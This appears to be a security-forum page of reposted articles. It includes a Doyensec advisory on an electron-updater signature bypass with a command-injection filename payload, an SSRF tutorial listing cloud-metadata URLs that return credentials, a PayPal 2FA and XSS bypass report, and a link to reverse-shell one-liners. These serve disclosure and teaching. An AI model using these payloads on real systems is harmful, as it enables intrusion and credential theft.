DEVELOPMENT 業務効率や生産性向上につながる時間管理 from University of California, Irvine Conducting an Informational Interview from University of Washington Attending a Networking Event from University of Washington Preparing to Network in English from University of Washington Communication Strategies for a Virtual Age from University of Toronto Communicating Effectively: How to Inspire and Convince from Delft University of Technology Effective Business Communication from Indian Institute of Management Bangalore Crafting Realities: Work, Happiness, and Meaning from Indian Institute of Management Bangalore Los videojuegos como medio de comunicación efectiva from The Pontificia Universidad Javeriana Психология карьеры from Saint Petersburg State University Креативная коммуникация: методы и инструменты from Saint Petersburg State University Career Credentials: Evidence Your Expertise in Problem Solving from Deakin University Career Credentials: Evidence Your Self-management Skills from Deakin University Career Credentials: Evidence Your Expertise in Digital Literacy from Deakin University Negociación 4.0 from Universidad Austral Emotional Intelligence at Work from Coventry University Sursa: https://www.classcentral.com/report/new-courses-october-2018/

Dupa parerea mea o sursa de informatii mult mai de incredere decat mass-media: https://9gag.com/gag/a6Ngxwq Cititi comentariile. Sunt pareri ale unor oameni simpli din multe tari.

Din mai multe domenii: http://index-of.es/

curl v2.wttr.in/Bucharest

How a Hacker's Mom Broke Into a Prison—and the Warden's Computer Security analyst John Strand had a contract to test a correctional facility’s defenses. He sent the best person for the job: his mother. PHOTOGRAPH: GETTY IMAGE John Strand breaks into things for a living. As a penetration tester, he gets hired by organizations to attack their defenses, helping reveal weaknesses before actual bad guys find them. Normally, Strand embarks on these missions himself, or deploys one of his experienced colleagues at Black Hills Information Security. But in July 2014, prepping for a pen test of a South Dakota correctional facility, he took a decidedly different tack. He sent his mom. In fairness, it was Rita Strand's idea. Then 58, she had signed on as chief financial officer of Black Hills the previous year after three decades in the food service industry. She was confident, given that professional experience, that she could pose as a state health inspector to gain access to the prison. All it would take was a fake badge and the right patter. "She approached me one day, and said 'You know, I want to break in somewhere," says Strand, who is sharing the experience this week at the RSA cybersecurity conference in San Francisco. "And it's my mom, so what am I supposed to say?" That's not as easy a call as it might sound. Penetration testers always say that you can get amazingly far with just a clipboard and some confidence, but a novice run at a state correctional facility is just plain daunting. And while pen testers are contractually permitted to break into a client's systems, if they're caught tensions can escalate quickly. Two pen testers who broke into an Iowa courthouse as part of their job recently spent 12 hours in jail after a run-in with local authorities. "I’m out in the middle of nowhere at a pie shop with no way to get to her." JOHN STRAND, BLACK HILLS INFORMATION SECURITY Rita Strand's mission would also be complicated by her lack of technical expertise. A professional pen tester would be able to assess an organization's digital security in real time and plant back doors tailored to what they found on the specific network. Rita had the health inspector guise down cold, but she was no hacker. COURTESY OF JOHN STRAND To help get her in the door, Black Hills made Rita a fake badge, a business card, and a "manager's" card with John's contact info on it. Assuming she got inside, she would then take photos of the facility's access points and physical security features. Rather than have her try to hack any computers herself, John equipped Rita with so-called Rubber Duckies, malicious USB sticks that she would plug into every device she could. The thumb drives would beacon back to her Black Hills colleagues and give them access to the prison's systems. Then they could work on the digital side of the pen test remotely, while Rita continued her rampage. "For most people, the first couple of times they do this they get really uncomfortable," Strand says. "But she was all ready to go. Prison cybersecurity is crucial for obvious reasons. If someone could break into the prison and take over computer systems, it becomes really easy to take someone out of the prison." The morning of the pen test, the Strands and some colleagues carpooled to a café near the prison. Over a preparatory caramel roll and slice of pecan pie, they set up a war room of laptops, mobile hot spots, and other gear. When everything was set, Rita drove off to the prison on her own. "She takes off, and I’m thinking in the back of my head that this is a really bad idea," Strand says. "She has no pen testing experience. No IT hacking experience. I had said, 'Mom, if this gets bad you need to pick up the phone and call me immediately.'" Pen testers usually try to get in and out of a facility as quickly as possible to avoid arousing suspicion. But after 45 minutes of waiting, there was no sign of Rita. "It gets to be about an hour, and I’m panicking," he says. "And I'm thinking I should have thought it through, because we all went in the same car so I’m out in the middle of nowhere at a pie shop with no way to get to her." Suddenly, the Black Hills laptops began blinking with activity. Rita had done it. The USB drives she had planted were creating so-called web shells, which gave the team at the café access to various computers and servers inside the prison. Strand remembers one colleague yelling out: "Your mom's OK!" In fact, Rita had encountered no resistance at all inside the prison. She told the guards at the entrance that she was conducting a surprise health inspection and they not only allowed her in, but let her keep her cell phone, with which she recorded the entire operation. In the facility's kitchen, she checked the temperatures in refrigerators and freezers, pretended to swab for bacteria on the floors and counters, looked for expired food, and took photos. But Rita also asked to see employee work areas and break areas, the prison's network operations center, and even the server room—all allegedly to check for insect infestations, humidity levels, and mold. No one said no. She was even allowed to roam the prison alone, giving her ample time to take photos and plant her Rubber Duckies. At the end of the "inspection," the prison director asked Rita to visit his office and suggest how the facility might improve its food service practices. She ran through some concerns, informed by decades being on the other side of health inspections. Then she handed him a specially prepared USB drive. The state had a helpful self-assessment checklist, she told the director, that he could use going forward to identify issues before an inspector showed up. The Microsoft Word document was tainted with a malicious macro. When the prison boss clicked, he inadvertently gave Black Hills access to his computer. "We were just dumbfounded," Strand says. "It was an overwhelming success. And there's a lot to take from it for the security community about fundamental weaknesses and the importance in institutional security of politely challenging authority. Even if someone says they're an elevator inspector or a health inspector or whatever, we need to do better about asking people questions. Don’t blindly assume." Other pen testers emphasize that while Rita's story is exceptional, it strongly reflects their daily experience. "The physical aspects of things and what you can claim is incredible. We do similar jobs all the time and rarely ever get caught," says David Kennedy, founder of the pen testing firm TrustedSec, who first heard an abridged version of Strand's story at the Derbycon security conference, which Kennedy ran. "If you claim to be inspectors, auditors, someone of authority, anything is possible." In 2016, Rita died of pancreatic cancer; she never had a chance to do another pen test. Strand declined to say which prison his mother infiltrated, only that it has since shut down. But her efforts made an impact. "The prison made security improvements as a result of the pen test," Strand says. "I also think their health program was improved by it as well." Sursa:Lhttps://www.wired.com/story/hackers-mom-broke-into-prison-wardens-computer/

Try these: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Sursa trusted, 9gag:

Dap, sunt multe trucuri care se pot face: https://2303380057

Signature Validation Bypass Leading to RCE In Electron-Updater 24 Feb 2020 - Posted by Lorenzo Stella We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw. Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers. This software is commonly used to build platform-specific packages for ElectronJs-based applications, and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms). A Fail Open Design As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution. The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes. To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security: execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], { timeout: 20 * 1000 }, (error, stdout, stderr) => { try { if (error != null || stderr) { handleError(logger, error, stderr) resolve(null) return } const data = parseOut(stdout) if (data.Status === 0) { const name = parseDn(data.SignerCertificate.Subject).get("CN")! if (publisherNames.includes(name)) { resolve(null) return } } const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2) logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`) resolve(result) } catch (e) { logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`) resolve(null) return } }) which translates to the following PowerShell command: powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress" Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64). For instance, a malicious update definition would look like: version: 1.2.3 files: - url: v’ulnerable-app-setup-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA== size: 44653912 path: v'ulnerable-app-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA== releaseDate: '2019-11-20T11:17:02.627Z' When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, she can leverage the lack of escaping to pull out a trivial command injection: version: 1.2.3 files: - url: v';calc;'ulnerable-app-setup-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA== size: 44653912 path: v';calc;'ulnerable-app-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA== releaseDate: '2019-11-20T11:17:02.627Z' From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges. Impact An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server. Disclosure Timelines Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability, together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk. At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including: Wordpress for Desktop - Still vulnerable in v4.7.0 IOTA Trinity Wallet - Auto-updates feature has been disabled for Windows (#2566, #2588) Alva - Still vulnerable in v0.9.2 MyMonero - Still vulnerable in v1.1.13 Cozy Drive - Still vulnerable in v3.19.0 On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates. Mitigations Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer. Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow. Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected. If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder. Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario. Credits This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post. Sursa: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

Exploiting SSRFs And how I got your company secrets. Vickie Li Jun 3, 2019 · 7 min read Now that we got the basics of SSRFs down, let’s learn to exploit them! If you aren’t familiar with SSRFs or need a refresher, here’s the first part of the series about SSRF: Intro to SSRF And how your firewall failed you. medium.com So what exactly can a hacker do with an SSRF vulnerability? Well, that usually depends on the internal services found on the network. Today, we’ll talk about a few common ways to exploit the vulnerability once you’ve found one. Let’s dive right in! I found an SSRF! What now? SSRF vulnerabilities can be used to: Scan the network for hosts, Port scan internal machines and fingerprint internal services, collect instance metadata, bypass access controls, leak confidential data, and even execute code on reachable machines. Network Scanning First, SSRFs can be used to scan the network for other reachable machines. This is done by feeding the vulnerable endpoint with a range of internal IP addresses and see if the server responds differently for each address. Using the differences in server behavior, we can gather info about the network structure. For example, when you request: https://public.example.com/upload_profile_from_url.php?url=10.0.0.1 The server responds with: Error: cannot upload image: http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 And when you request: https://public.example.com/upload_profile_from_url.php?url=10.0.0.2 The server responds with: Error: cannot upload image: Connection Failed We can deduce that 10.0.0.1 is the address of a valid host on the network, while 10.0.0.2 is not. Port Scanning and Service Fingerprinting SSRF can also be used to port scan network machines and reveal services running on these machines. Open ports provide a pretty good indicator of services running on the machine, as services have default ports that they run on, and port scan results point you to ports to inspect manually. This will help you plan further attacks tailored to the services found. Provide the vulnerable endpoint with different ports of identified internal machines and determine if there is a difference in server behavior between ports. It’s the same process as scanning for hosts, except this time, you’re switching out port numbers. (Port numbers range from 0 to 65535.) For example, when you send a request to port 80 on an internal server (eg. 10.0.0.1:80), the server responds with: Error: cannot upload image: http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 And when you send a request to port 11 on the same server (eg. 10.0.0.1:11), the server responds with this: Error: cannot upload image: Connection Failed We can deduce that port 80 is open on the server, while port 11 is not. Pulling Instance Metadata Amazon Elastic Compute Cloud (Amazon EC2) is a service that allows businesses to run applications in the public cloud. It has a service called “Instance Metadata”. This enables EC2 instances to access an API that returns data about the instance itself (on the address 169.254.169.254). An instance metadata API service similar to that of EC2’s is also available on Google Cloud. These API endpoints are accessible by default unless they are specifically blocked or disabled by network admins. The information these services reveal is often extremely sensitive and could potentially allow attackers to escalate SSRFs to serious info leaks and RCE (Remote Code Execution). Querying AWS EC2 Metadata If a company is hosting its infrastructure on Amazon EC2, you can query various instance metadata about the host using the endpoints at http://169.254.169.254/latest/meta-data/ These endpoints reveal information such as API keys, AWS S3 tokens, and passwords. Here is the complete documentation from Amazon. Here are a few especially useful ones to go after first: http://169.254.169.254/latest/meta-data/ returns the list of available metadata that you can query. http://169.254.169.254/latest/meta-data/local-hostname/ returns the internal hostname used by the host. http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME returns the security credentials of that role. http://169.254.169.254/latest/dynamic/instance-identity/document reveals the private IP address of the current instance. http://169.254.169.254/latest/user-data/ returns user data on the current instance. Querying Google Cloud Metadata If the company uses Google Cloud, you could try to query Google Instance Metadata API instead. Google implements some additional security measures for their API endpoints — Querying Google Cloud Metadata APIv1 requires special headers: “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” But this protection can be easily bypassed because most endpoints accessible through APIv1 can be accessed via the API v1beta1 endpoints instead. And API v1beta1 does not have the same header requirements. Here’s the full documentation of the API from Google. Here are a few critical pieces of information to go after first: http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token returns the access token of the default account on the instance. http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-key returns public SSH keys that can connect to other instances in this project. Amazon and Google aren’t the only web services that provide metadata APIs. However, these two have quite a large market share so chances are the company that you are testing is on one of these platforms. If not, here’s a list of other cloud metadata services and things you can try. Using What You’ve Got Now using what you’ve found by scanning the network, identifying services and pulling instance metadata, you can try to pull these off: Bypass access controls: Some internal services might only control access based on IP addresses or internal headers. It might be possible to bypass access controls to sensitive functionalities just by sending the request from a trusted machine. Leak confidential information: If you’re able to find credentials using the SSRF, you can then use those credentials to access confidential information stored on the network. For example, if you were able to find AWS S3 keys, go through the company’s private S3 buckets and see if you have access to those. Execute code: You can use the info you gathered to turn SSRF into RCE. For example, if you found admin credentials that give you write privileges, try uploading a shell. Or if you found an unsecured admin panel, are there any features that allow the execution of scripts? Better yet, maybe you can log in as root? Blind SSRFs Blind SSRFs are SSRFs where you don’t get a response or error message back from the target server. The exploitation of blind SSRFs is often limited to network mapping, port scanning, and service discovery. Since you can’t extract information directly from the target server, exploitation of blind SSRFs relies heavily on deduction. Utilizing HTTP status codes and server response times, we can achieve similar results as regular SSRF. Network and Port Scanning using HTTP status codes For example, when you feed the following request results in an HTTP status code of 200 (Status code for “OK”). https://public.example.com/webhook?url=10.0.0.1 While the following request results in an HTTP status code of 500 (Status code for “Internal Server Error”). https://public.example.com/webhook?url=10.0.0.2 We can deduce that 10.0.0.1 is the address of a valid host on the network, while 10.0.0.2 is not. Port scanning with blind SSRF works the same way. If the server returns a 200 status code for some ports and 500 for others, the ports that yield a 200 status code might be the open ports on the machine. Network and Port Scanning using Server response times If the server is not returning any useful information in the form of status codes, all is not lost. You might still be able to figure out the network structure by examining how long the server is taking to respond to your request. If the server is taking much longer to respond for some addresses, it might indicate that those network addresses are unrouted, or are hidden behind a firewall. On the other hand, unusually short response times may also indicate unrouted address, if the request is dropped by the router immediately. If the server is taking much longer to respond for some ports, it might indicate that those ports are closed. Check out this graph published by @jobert on the Hackerone Blog. It provides a good overview of how a network would behave. When performing any kind of network or port scanning, it is important to remember that vulnerable machines behave differently, and the key is to look for differences in behavior instead of the specific signatures described above. Leaking Info to External Servers The target machine might also leak sensitive information in outbound requests, such as internal IPs, headers, and version numbers of the software used. Try to provide the vulnerable endpoint with the address of a server you own and see what you can extract from the incoming request! Conclusion SSRF is a vulnerability that is full of potential. Here’s a link to the SSRF Bible. It discusses many more methods of exploiting SSRFs. In future posts, we will discuss real-life examples of how master hackers have utilized SSRF to own company networks! Happy Hacking! Next time, we’ll talk about how to bypass common SSRF protection mechanisms used by companies. Hi there, thanks for reading. Please help make this a better resource for new hackers: feel free to point out any mistakes or let me know if there is anything I should add! Disclaimer: Trying this on systems where you don’t have permission to test is illegal. If you’ve found a vulnerability, please disclose it responsibly to the vendor. Help make our Internet a safer place Thanks to Jennifer Li. Web Security AWS Penetration Testing Bug Bounty Hacking Written by Vickie Li Professional investigator of nerdy stuff. Hacks and secures. Creates god awful infographics. https://twitter.com/vickieli7 Sursa: https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437

Breaking LTE on Layer Two David Rupprecht, Katharina Kohls, Thorsten Holz, and Christina Pöpper Ruhr-Universität Bochum & New York University Abu Dhabi Introduction Security Analysis of Layer Two Our security analysis of the mobile communication standard LTE ( Long-Term Evolution, also know as 4G) on the data link layer (so called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol. On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard. In the following, we provide an overview of the website fingerprinting and aLTE attack, and explain how we conducted them in our lab setup. Our work will appear at the 2019 IEEE Symposium on Security & Privacy and all details are available in a pre-print version of the paper. Sursa: https://alter-attack.net/

time_waste iOS 13.0-13.3 tfp0 for all devices (in theory) using heap overflow bug by Brandon Azad (CVE-2020-3837) and cuck00 info leak by Siguza (will probably remove in the future). Exploitation is mostly the same as oob_timestamp with a few differences. The main difference is that this one does not rely on hardcoded addresses and thus should be more reliable. The rest of the code is under GPL (exception given to the unc0ver team) Sursa: https://github.com/jakeajames/time_waste

We found 6 critical PayPal vulnerabilities – and PayPal punished us for it by Bernard Meyer February 17, 2020 in Security 6 19 SHARES Share on FacebookShare on Twitter In the news, it seems that PayPal gives a lot of money to ethical hackers that find bugs in their tools and services. In March 2018, PayPal announced that they’re increasing their maximum bug bounty payment to $30,000 – a pretty nice sum for hackers. On the other hand, ever since PayPal moved its bug bounty program to HackerOne, its entire system for supporting bug bounty hunters who identify and report bugs has become more opaque, mired in illogical delays, vague responses, and suspicious behavior. When our analysts discovered six vulnerabilities in PayPal – ranging from dangerous exploits that can allow anyone to bypass their two-factor authentication (2FA), to being able to send malicious code through their SmartChat system – we were met with non-stop delays, unresponsive staff, and lack of appreciation. Below, we go over each vulnerability in detail and why we believe they’re so dangerous. When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched, although we received no bounty, credit, or even a thanks. Instead, we got our Reputation scores (which start out at 100) negatively impacted, leaving us worse off than if we’d reported nothing at all. It’s unclear where the majority of the problem lies. Before going through HackerOne, we attempted to communicate directly with PayPal, but we received only copy-paste Customer Support responses and humdrum, say-nothing responses from human representatives. There also seems to be a larger issue of HackerOne’s triage system, in which they employ Security Analysts to check the submitted issues before passing them onto PayPal. The only problem – these Security Analysts are hackers themselves, and they have clear motivation for delaying an issue in order to collect the bounty themselves. Since there is a lot more money to be made from using or selling these exploits on the black market, we believe the PayPal/HackerOne system is flawed and will lead to fewer ethical hackers providing the necessary help in finding and patching PayPal’s tools. Vulnerabilities we discovered In our analysis of PayPal’s mobile apps and website UI, we were able to uncover a series of significant issues. We’ll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user. #1 Bypassing PayPal’s two-factor authentication (2FA) Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal’s phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called “Authflow” on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address. How we did it In order to bypass PayPal’s 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy. Then, through a series of steps, the researcher was able to get an elevated token to enter the account. (Since the vulnerability hasn’t been patched yet, we can’t go into detail of how it was done.) The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal’s lauded security system useless. What’s the worst case scenario here? Stolen PayPal credentials can go for just $1.50 on the black market. Essentially, it’s exactly because it’s so difficult to get into people’s PayPal accounts with stolen credentials that these stolen credentials are so cheap. PayPal’s authflow is set up to detect and block suspicious login attempts, usually related to a new device or IP, besides other suspicious actions. But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts. With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers. PayPal’s response We’ll assume that HackerOne’s response is representative of PayPal’s response. For this issue, PayPal decided that, since the user’s account must already be compromised for this attack to work, “there does not appear to be any security implications as a direct result of this behavior.” Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process. #2 Phone verification without OTP Our analysts discovered that it’s pretty easy to confirm a new phone without an OTP (One-Time Pin). PayPal recently introduced a new system where it checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number. How we did it When a user registers a new phone number, an onboard call is made to api-m.paypal.com, which sends the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed. The call can be repeated on already registered accounts to verify the phone. What’s the worst case scenario here? Scammers can find lots of uses for this vulnerability, but the major implication is unmissable. By bypassing this phone verification, it will make it much easier for scammers to create fraudulent accounts, especially since there’s no need to receive an SMS verification code. PayPal’s response Initially, the PayPal team via HackerOne took this issue more seriously. However, after a few exchanges, they stopped responding to our queries, and recently PayPal itself (not the HackerOne staff) locked this report, meaning that we aren’t able to comment any longer. #3 Sending money security bypass PayPal has set up certain security measures in order to help avoid fraud and other malicious actions on the tool. One of these is a security measure that’s triggered when one of the following conditions, or a combination of these, is met: You’re using a new device You’re trying to send payments from a different location or IP address There’s a change in your usual sending pattern The owning account is not “aged” well (meaning that it’s pretty new) When these conditions are met, PayPal may throw up a few types of errors to the users, including: “You’ll need to link a new payment method to send the money” “Your payment was denied, please try again later” How we did it Our analysts found that PayPal’s sending money security block is vulnerable to brute force attacks. What’s the worst case scenario here? This is similar in impact to Vulnerability #1 mentioned above. An attacker with access to stolen PayPal credentials can access these accounts after easily bypassing PayPal’s security measure. PayPal’s response When we submitted this to HackerOne, they responded that this is an “out-of-scope” issue since it requires stolen PayPal accounts. As such, they closed the issue as Not Applicable, costing us 5 reputation points in the process. #4 Full name change By default, PayPal allows users to only change 1-2 letters of their name once (usually because of typos). After that, the option to update your name disappears. However, using the current version of PayPal.com, the CyberNews research team was able to change a test account’s name from “Tester IAmTester” to “christin christina”. How we did it We discovered that if we capture the requests and repeat it every time by changing 1-2 letters at a time, we are able to fully change account names to something completely different, without any verification. We also discovered that we can use any unicode symbols, including emojis, in the name field. What’s the worst case scenario here? An attacker, armed with stolen PayPal credentials, can change the account holder’s name. Once they’ve completely taken over an account, the real account holder wouldn’t be able to claim that account, since the name has been changed and their official documents would be of no assistance. PayPal’s response This issue was deemed a Duplicate by PayPal, since it had been apparently discovered by another researcher. #5 The self-help SmartChat stored XSS vulnerability PayPal’s self-help chat, which it calls SmartChat, lets users find answers to the most common questions. Our research discovered that this SmartChat integration is missing crucial form validation that checks the text that a person writes. How we did it Because the validation is done at the front end, we were able to use a man in the middle (MITM) proxy to capture the traffic that was going to Paypal servers and attach our malicious payload. What’s the worst case scenario here? Anyone can write malicious code into the chatbox and PayPal’s system would execute it. Using the right payload, a scammer can capture customer support agent session cookies and access their account. With that, the scammer can log into their account, pretend to be a customer support agent, and get sensitive information from PayPal users. PayPal’s response The same day that we informed PayPal of this issue, they replied that since it isn’t “exploitable externally,” it is a non-issue. However, while we planned to send them a full POC (proof of concept), PayPal seems to have removed the file on which the exploit was based. This indicates that they were not honest with us and patched the problem quietly themselves, providing us with no credit, thanks, or bounty. Instead, they closed this as Not Applicable, costing us another 5 points in the process. #6 Security questions persistent XSS This vulnerability is similar to the one above (#5), since PayPal does not sanitize its Security Questions input. How we did it Because PayPal’s Security Questions input box is not validated properly, we were able to use the MITM method described above. Here is a screenshot that shows our test code being injected to the account after refresh, resulting in a massive clickable link: What’s the worst case scenario here? Attackers can inject scripts to other people’s accounts to grab sensitive data. By using Vulnerability #1 and logging in to a user’s account, a scammer can inject code that can later run on any computer once a victim logs into their account. This includes: Showing a fake pop up that could say “Download the new PayPal app” which could actually be malware. Changing the text user is adding. For example, the scammer can alter the email where the money is being sent. Keylogging credit card information when the user inputs it. There are many more ways to use this vulnerability and, like all of these exploits, it’s only limited by the scammer’s imagination. PayPal’s response The same day we reported this issue, PayPal responded that it had already been reported. Also on the same day, the vulnerability seems to have been patched on PayPal’s side. They deemed this issue a Duplicate, and we lost another 5 points. PayPal’s reputation for dishonesty PayPal has been on the receiving end of criticism for not honoring its own bug bounty program. Most ethical hackers will remember the 2013 case of Robert Kugler, the 17-year old German student who was shafted out of a huge bounty after he discovered a critical bug on PayPal’s site. Kugler notified PayPal of the vulnerability on May 19, but apparently PayPal told him that because he was under 18, he was ineligible for the Bug Bounty Program. But according to PayPal, the bug had already been discovered by someone else, but they also admitted that the young hacker was just too young. Another researcher earlier discovered that attempting to communicate serious vulnerabilities in PayPal’s software led to long delays. At the end, and frustrated, the researcher promises to never waste his time with PayPal again. There’s also the case of another teenager, Joshua Rogers, also 17 at the time, who said that he was able to easily bypass PayPal’s 2FA. He went on to state, however, that PayPal didn’t respond after multiple attempts at communicating the issue with them. PayPal acknowledged and downplayed the vulnerability, later patching it, without offering any thanks to Rogers. The big problem with HackerOne HackerOne is often hailed as a godsend for ethical hackers, allowing companies to get novel ways to patch up their tools, and allowing hackers to get paid for finding those vulnerabilities. It’s certainly the most popular, especially since big names like PayPal work exclusively with the platform. There have been issues with HackerOne’s response, including the huge scandal involving Valve, when a researcher was banned from HackerOne after trying to report a Steam zero-day. However, its Triage system, which is often seen as an innovation, actually has a serious problem. The way that HackerOne’s triage system works is simple: instead of bothering the vendor (HackerOne’s customer) with each reported vulnerability, they’ve set up a system where HackerOne Security Analysts will quickly check and categorize each reported issue and escalate or close the issues as needed. This is similar to the triage system in hospitals. These Security Analysts are able to identify the problem, try to replicate it, and communicate with the vendor to work on a fix. However, there’s one big flaw here: these Security Analysts are also active Bug Bounty Hackers. Essentially, these Security Analysts get first dibs on reported vulnerabilities. They have full discretion on the type of severity of the issue, and they have the power to escalate, delay or close the issue. That presents a huge opportunity for them, if they act in bad faith. Other criticisms have pointed out that Security Analysts can first delay the reported vulnerability, report it themselves on a different bug bounty platform, collect the bounty (without disclosing it of course), and then closing the reported issue as Not Applicable, or perhaps Duplicate. As such, the system is ripe for abuse, especially since Security Analysts on HackerOne use generic usernames, meaning that there’s no real way of knowing what they are doing on other bug bounty platforms. What it all means All in all, the exact “Who is to blame” question is left unanswered at this point, because it is overshadowed by another bigger question: why are these services so irresponsible? Let’s point out a simple combination of vulnerabilities that any malicious actor can use: Buy PayPal accounts on the black market for pennies on the dollar. (On this .onion website, you can buy a $5,000 PayPal account for just $150, giving you a 3,333% ROI.) Use Vulnerability #1 to bypass the two-factor authentication easily. Use Vulnerability #3 to bypass the sending money security and easily send money from the linked bank accounts and cards. Alternatively, the scammer can use Vulnerability #1 to bypass 2FA and then use Vulnerability #4 to change the account holder’s name. That way, the scammer can lock the original owner out of their own account. While these are just two simple ways to use our discovered vulnerabilities, scammers – who have much more motivation and creativity for maliciousness (as well as a penchant for scalable attacks) – will most likely have many more ways to use these exploits. And yet, to PayPal and HackerOne, these are non-issues. Even worse, it seems that you’ll just get punished for reporting it. Share19TweetShare Bernard Meyer Bernard Meyer is a security researcher at CyberNews. He has a strong passion for security in popular software, maximizing privacy online, and keeping an eye on governments and corporations. You can usually find him on Twitter arguing with someone about something moderately important. Sursa: https://cybernews.com/security/we-found-6-critical-paypal-vulnerabilities-and-paypal-punished-us/

